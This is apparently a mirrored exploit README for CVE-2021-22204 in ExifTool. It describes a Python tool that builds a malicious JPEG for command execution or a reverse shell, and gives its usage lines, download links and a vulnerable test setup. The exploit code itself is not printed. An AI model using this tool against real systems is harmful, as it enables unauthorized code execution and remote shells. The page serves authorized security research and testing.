Share
## https://sploitus.com/exploit?id=D1EFC5A3-3F5B-5A00-9A45-80777934AC77
# Exploit for CVE-2021-22204 (ExifTool)
For educational and authorized security research purposes only.
```
              _ __,~~~/_     ______   ______    ___  ___  ___ ___    ___  ___  ___  ___  ____
          ,~~`( )_( )-\|    / ___/ | / / __/___|_  |/ _ \|_  <  /___|_  ||_  ||_  |/ _ \/ / /
               |/|  `--.   / /__ | |/ / _//___/ __// // / __// /___/ __// __// __// // /_  _/
               ! !  !      \___/ |___/___/   /____/\___/____/_/   /____/____/____/\___/ /_/ 
```

**Like this repo? Give us a โญ!**

## Exploit Author
[@UNICORDev](https://unicord.dev) by ([@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))

## Vulnerability Description
Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.

## Exploit Description
Use this exploit to generate a JPEG image payload that can be used with a vulnerable ExifTool version for code execution. A custom command can be provided or a reverse shell can be generated. A JPEG image is automatically generated, and optionally, a custom JPEG image can be supplied to have the payload inserted.

## Usage
```bash
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h
```

## Options
```bash
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.
```

## Download
[Download exploit-CVE-2021-22204.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2021-22204/main/exploit-CVE-2021-22204.py)

[Download exploit-CVE-2021-22204.py from ExploitDB](https://www.exploit-db.com/exploits/50911)

### Searchsploit (ExploitDB)
```bash
searchsploit -u
searchsploit -m 50911
```

## Exploit Requirements
- python3
- djvulibre-bin
- exiftool

## Demo
![165973184-f90baf89-fd4f-47d4-b37a-eadb7b528dfb](https://user-images.githubusercontent.com/23003787/165996718-1878ef28-e6ac-492c-a196-1528747ea48d.gif)

## Tested On
Exiftool Version 12.23

## Applies To
Exiftool Versions 7.44 - 12.23

## Test Environment
```bash
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
```

## Test Generated Payload
```bash
exiftool image.jpg
```

## Credits
- https://hackerone.com/reports/1154542
- https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22204
- https://app.hackthebox.com/machines/Overflow
- https://www.exploit-db.com/exploits/50911